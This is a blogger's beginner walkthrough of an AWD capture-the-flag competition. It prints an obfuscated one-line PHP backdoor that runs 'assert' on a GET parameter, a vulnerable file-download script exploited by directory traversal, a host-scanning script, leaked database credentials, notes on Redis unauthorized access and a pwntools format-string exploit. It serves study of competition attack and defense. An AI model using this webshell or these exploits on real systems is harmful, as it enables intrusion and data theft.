Table of contents
2. xshell connection and html directory download
3. Use of D-Shield and Hippo (File Scanning)
5. Explode the opponent’s IP address
(1) mysql remote access vulnerability
(2) Redis unauthorized access vulnerability
1. Things to note
# Before the game starts, the captain will add each player's IP address to the whitelist.
# After the game starts, there will be 30 minutes for reinforcement and repair. At this time, the opponent's IP cannot be obtained.
# The AWD competition will restrict or prohibit the use of some tools. Please refer to the competition rules for details.
# This competition is a team of 3 people, generally divided into vulnerability patching (defense), code auditing (hole digging), and vulnerability exploitation (attack)
2. xshell connection and html directory download
After getting the account password, use xshell to connect
Enter the host IP and port number
Perform user authentication
Enter the given username and password
After the connection is successful, switch to the html directory
Download the html directory under var/www (you can use commands to package or use xftp to transfer)
3. Use of D-Shield and Hippo (File Scanning)
Throw the directory to D-Shield and Hippo for scanning and killing
./hm scan html
# 先切换到河马所在目录,同时将我们下载的html目录也移动到河马所在目录,更方便扫描
# ./表示执行,这里可以使用scan也可以使用deepscan进行深度扫描,后面接需要扫描的目录
Check the scan results. Here, both D-Shield and Hippo have detected two backdoor files.
We can check the detailed file config.php
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>analyze:
1. `$poc` 变量包含了字符串 "a#s#s#e#r#t"。
2. 使用 `explode("#", $poc)` 函数将字符串分割成数组 `$poc_1`,每个元素都是 "a"、"s"、"s"、"e"、"r"、"t"。
3. 然后,将数组 `$poc_1` 的元素连接起来,形成字符串 `$poc_2`,其值为 "assert"。
4. 最后,代码执行了 `$poc_2($_GET['s'])`,它将执行用户通过 GET 请求传递的参数 's' 对应的值,作为 PHP 代码来执行。
我们只需要控制 's' 参数的值,便可以在服务器上执行任意的 PHP 代码,这种代码结构常被称为 "PHP代码注入",因为它允许我们注入恶意代码。To put it bluntly, this is a one-sentence Trojan
We find the path where config.php is located based on the downloaded html directory.
Use directly
Successfully got the flag
We not only need to attack, but also need to repair it, directly delete the config.php of our website
No loopholes were found in ip.php and info.php. Of course, you can delete them if you are worried.
4. Use of Seay (code audit)
Put the directory into Seay for source code auditing (this work should be done at the same time as scanning, I will just talk about it separately here)
View file details word.php
<?php
error_reporting(0);
// 接受 GET 方式传递过来的 file 值
$f_name = $_GET['src'];
$file_path = "../resources/".$f_name;
if(file_exists($file_path)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file_path));
flush();
readfile($file_path);
die();
} else {
http_response_code(404);
}
?>This PHP code is mainly used for file downloading:
1. `error_reporting(0);` 语句用于关闭PHP错误报告,这意味着在运行时不会显示任何PHP错误或警告。
2. 通过 `$_GET['src']` 获取名为 'src' 的GET参数的值,该值应该是要下载的文件名。
3. 构建文件路径 `$file_path`,将 "../resources/" 与 GET 参数 'src' 的值连接起来,形成完整的文件路径。
4. 使用 `file_exists($file_path)` 检查文件是否存在。如果文件存在,继续执行下面的代码块。
5. 设置一系列HTTP响应头,以指定下载文件的各种属性,如文件类型、文件名、缓存控制等。
6. 使用 `readfile($file_path)` 输出文件内容,将文件发送到浏览器进行下载。
7. `die()` 语句用于终止PHP脚本的执行,确保只返回文件内容,而不会继续执行其他代码。
8. 如果文件不存在,使用 `http_response_code(404)` 设置HTTP响应代码为404(文件未找到。Allows the user to download a file on the server via a GET request, if the file exists.
The script word.php is located in the api directory and requests the parameter src in the get method.
We know that the flag is under the root directory. Here we can use ../ (to access the upper-level directory) to implement directory traversal attacks.
This is also called an arbitrary file read vulnerability.
Attack successful
5. Explode the opponent’s IP address
This can only be exploded 30 minutes after the game starts.
You can set a blasting range yourself, and the content in the URL can be slightly modified according to the actual situation of the game.
The blasting results will be stored in host.txt
Attached is the script below:
import requests
from concurrent.futures import ThreadPoolExecutor
import re
f = open("host.txt", "w")
def get_ip(url):
resp = requests.get(url)
status = resp.status_code
if status == 200:
f.write(url + "\n")
print(url)
url = []
for i in range(1, 255):
url.append("http://192-168-1-" + str(i) + ".pvp2932.bugku.cn")
with ThreadPoolExecutor(max_workers=100) as executor:
executor.map(get_ip, url)
6. Others
(1) mysql remote access vulnerability
We can get the database information through dbconfig.php in the directory:
the account number is cms and the password is cms (3306 is the default port number of the mysql database)
If you are interested, you can learn about the relevant things yourself, but I have not successfully connected here.
(2) Redis unauthorized access vulnerability
By default, Redis will be bound to 0.0.0.0:6379. If no relevant policies are adopted, such as adding firewall rules to avoid IP access from other untrusted sources, etc., this will expose the Redis service to the public network. If there is no When password authentication is set, any user who can access the target server will be unauthorized to access Redis and read Redis data. An attacker without authorized access to Redis can use the config command provided by Redis itself to perform file writing operations.
Since I am new to this and am not familiar with Redis instructions, you can find other related articles.
If you want to exploit this vulnerability, you need to install a tool redis-cli first.
Later I found that connecting to the redis database does not require installing redis-cli. It is also possible to use telnet.
(3) pwn vulnerability
I don’t know much about pwn. I can only do simple stack overflow. This is something you can only learn by yourself.
The following is the exp script provided by wp (there may be problems):
from pwn import *
context.terminal = ['termite', '-e']
#p = gdb.debug('./easy_string_format', gdbscript='b *main+125\nc')
p = process('./echoasaservice')
p.recvline()
payload = bytearray()
payload += "%8$lx.%9$lx.%10$lx".encode()
p.sendline(payload)
flag = p.recvline().decode('utf-8').rstrip()
split = flag.split('.')
endian = "".join(["".join(reversed([j[i:i+2] for i in range(0, len(j), 2)])) for j in split])
print(bytearray.fromhex(endian).decode())The introduction to AWD ends here. Due to my limited technical knowledge, I am not able to demonstrate many things to you. I can only rely on you to learn by yourself. However, I still hope that after reading this article, it can help everyone understand and get started with the basic process of AWD.
I will continue to share knowledge about network security and CTF with you later.
I'm Myon. If you like it, you can follow it, like it and support it. Thank you everyone!